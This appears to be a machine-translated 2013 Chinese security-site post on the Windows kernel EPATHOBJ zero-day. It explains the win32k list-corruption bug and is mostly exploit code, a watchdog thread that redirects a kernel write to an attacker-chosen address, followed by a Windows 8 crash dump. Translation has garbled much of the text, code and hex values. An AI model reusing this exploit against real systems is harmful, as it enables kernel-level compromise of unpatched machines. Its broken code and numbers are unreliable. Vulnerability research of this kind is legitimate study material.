The Windows kernel-EPATHOBJ 0day exploit-vulnerability warning-the black bar safety net

2013-05-23T00:00:00
ID MYHACK58:62201338894
Type myhack58
Reporter 佚名
Modified 2013-05-23T00:00:00

Description

This vulnerability is through the PATHALLOC()for memory pressure of the test broke, the first use of PATHREC>pointing to the same user space PATHREC EPATHOBJ::bFlatten it will”spin”for an unlimited linked list traversal.

Such as:PathRecord->next = PathRecord;

Although it will spin,but it will be by another thread pool patch(pprFlattenRec)to the list of node because it is in user space.

First, create a”monitor thread( watchdog)”, the atomically patch list, because pprFlattenRec premature exit,the bug cannot be exploited will lead to HeavyAllocPool failure.

pprFlattenRec : . text:BFA122B8 call newpathrec ; EPATHOBJ::newpathrec(_PATHRECORD * ,ulong ,ulong) . text:BFA122BD cmp eax, 1 ; Check for failure . text:BFA122C0 jz short continue . text:BFA122C2 xor eax, eax ; Exit early . text:BFA122C4 jmp early_exit

So you want to create a list of nodes:

PathRecord->Next = PathRecord; PathRecord->Flags = 0;

Then EPATHOBJ::bFlatten()spin:

BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ this) { / ... */

for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext ) { if ( ppr->flags & PD_BEZIER ) { ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr); } }

/ ... / }

Be the first to clear off another thread,then the thread repair(because in userspace it can be done)to trigger the vulnerability from

/ / EPATHOBJ:: bFlatten()

The first pprFlattenRec code block:

if ( pprNew->pprPrev ) pprNew->pprPrev->pprnext = pprNew; Writing 0xCCCCCCCC: DWORD WINAPI WatchdogThread(LPVOID Parameter) { ## This program a timeout will wait for a mutex object,and then repair the damaged list points to a vulnerability.

LogMessage(L_INFO, “Watchdog thread %u waiting on Mutex () %p”, GetCurrentThreadId(), Mutex); if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {

Make the master(main)thread can not call to FlattenPath(),

Because the kernel EPATHOBJ::bFlatten()the spin can be cleaned up(clear).

And then patch the list to trigger our exploit.

while (NumRegion–) DeleteObject(Regions[NumRegion]);

LogMessage(L_ERROR, “InterlockedExchange(%p, %p);”,

&PathRecord->next, &ExploitRecord);

InterlockedExchangePointer(&PathRecord->next, &ExploitRecord); } else { LogMessage(L_ERROR, “Mutex object did not timeout, list not patched”); } return 0; } PathRecord->next = PathRecord; PathRecord->prev = (PVOID)(0×4 2 4 2 4 2 4 2); PathRecord->flags = 0; ExploitRecord. next = NULL; ExploitRecord. prev = 0xCCCCCCCC; ExploitRecord. flags = PD_BEZIERS;

In Win 8 The following output:

kd> g


  • *
  • Bugcheck Analysis *
  • *

Use ! analyze-v to get detailed debugging information.

BugCheck 5 0, {cccccccc, 1, 8f18972e, 2}

WARNING: Unable to verify checksum for ComplexPath.exe ERROR: Module load completed but symbols could not be loaded for ComplexPath.exe Probably caused by : win32k.sys ( win32k! EPATHOBJ::pprFlattenRec+8 2 )

Followup: MachineOwner

nt! RtlpBreakWithStatusInstruction: 810f46f4 cc int 3 kd> kv ChildEBP RetAddr Args to Child a03ab494 8111c87d 0 0 0 0 0 0 0 3 c17b60e1 cccccccc nt! RtlpBreakWithStatusInstruction (FPO: [1,0,0]) a03ab4e4 8111c119 0 0 0 0 0 0 0 3 817d5340 a03ab8e4 nt! KiBugCheckDebugBreak+0x1c (FPO: [Non-Fpo]) a03ab8b8 810f30ba 0 0 0 0 0 0 5 0 cccccccc 0 0 0 0 0 0 0 1 nt! KeBugCheck2+0x655 (FPO: [6,239,4]) a03ab8dc 810f2ff1 0 0 0 0 0 0 5 0 cccccccc 0 0 0 0 0 0 0 1 nt! KiBugCheck2+0xc6 a03ab8fc 811a2816 0 0 0 0 0 0 5 0 cccccccc 0 0 0 0 0 0 0 1 nt! KeBugCheckEx+0x19 a03ab94c 810896cf 0 0 0 0 0 0 0 1 cccccccc a03aba2c nt! ?? ::FNODOBFM::`string'+0x31868 a03aba14 8116c4e4 0 0 0 0 0 0 0 1 cccccccc 0 0 0 0 0 0 0 0 nt! MmAccessFault+0x42d (FPO: [4,37,4]) a03aba14 8f18972e 0 0 0 0 0 0 0 1 cccccccc 0 0 0 0 0 0 0 0 nt! KiTrap0E+0xdc (FPO: [0,0] TrapFrame @ a03aba2c) a03abbac 8f103c28 0124eba0 a03abbd8 8f248f79 win32k! EPATHOBJ::pprFlattenRec+0x82 (FPO: [Non-Fpo]) a03abbb8 8f248f791c010779 0016fd04 8f248f18 win32k! EPATHOBJ::bFlatten+0x1f (FPO: [0,1,0]) a03abc08 8116918c 1c010779 0016fd18 776d7174 win32k! NtGdiFlattenPath+0x61 (FPO: [1,15,4]) a03abc08 776d7174 1c010779 0016fd18 776d7174 nt! KiFastCallEntry+0x12c (FPO: [0,3] TrapFrame @ a03abc14) 0016fcf4 76b1552b 0124147f 1c010779 0 0 0 0 0 0 4 0 ntdll! KiFastSystemCallRet (FPO: [0,0,0]) 0016fcf8 0124147f 1c010779 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 0 GDI32! NtGdiFlattenPath+0xa (FPO: [1,0,0]) WARNING: Stack unwind information not available. Following frames may be wrong. 0016fd18 01241ade 0 0 0 0 0 0 0 1 00202b50 00202ec8 ComplexPath+0x147f 0016fd60 76ee1866 7f0de000 0016fdb0 7 7 7 1 6 9 1 1 ComplexPath+0x1ade 0016fd6c 7 7 7 1 6 9 1 1 7f0de000 bc1d7832 0 0 0 0 0 0 0 0 KERNEL32! BaseThreadInitThunk+0xe (FPO: [Non-Fpo]) 0016fdb0 777168bd ffffffff 7778560a 0 0 0 0 0 0 0 0 ntdll!__ RtlUserThreadStart+0x4a (FPO: [SEH]) 0016fdc0 0 0 0 0 0 0 0 0 01241b5b 7f0de000 0 0 0 0 0 0 0 0 ntdll! _RtlUserThreadStart+0x1c (FPO: [Non-Fpo]) kd> . trap a03aba2c ErrCode = 0 0 0 0 0 0 0 2 eax=cccccccc ebx=8 0 2 0 6 0 1 4 ecx=8 0 2 0 6 0 0 8 edx=85ae1224 esi=0124eba0 edi=a03abbd8 eip=8f18972e esp=a03abaa0 ebp=a03abbac iopl=0 nv up ei ng nz na pe nc cs=0 0 0 8 ss=0 0 1 0 ds=0 0 2 3 es=0 0 2 3 fs=0 0 3 0 gs=0 0 0 0 efl=0 0 0 1 0 2 8 6 win32k! EPATHOBJ::pprFlattenRec+0x82: 8f18972e 8 9 1 8 mov dword ptr [eax],ebx ds:0 0 2 3:cccccccc=???????? kd> vertarget Windows 8 Kernel Version 9 2 0 0 MP (1 procs) Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: 9200.16581. x86fre. win8_gdr. 130410-1505 Machine Name: Kernel base = 0x81010000 PsLoadedModuleList = 0x811fde48 Debug session time: Mon May 2 0 1 4:1 7:20.259 2 0 1 3 (UTC - 7:0 0) System Uptime: 0 days 0:0 2:30.432 kd> . bugcheck Bugcheck code 0 0 0 0 0 0 5 0 Arguments cccccccc 0 0 0 0 0 0 0 1 8f18972e 0 0 0 0 0 0 0 2

[1] [2] next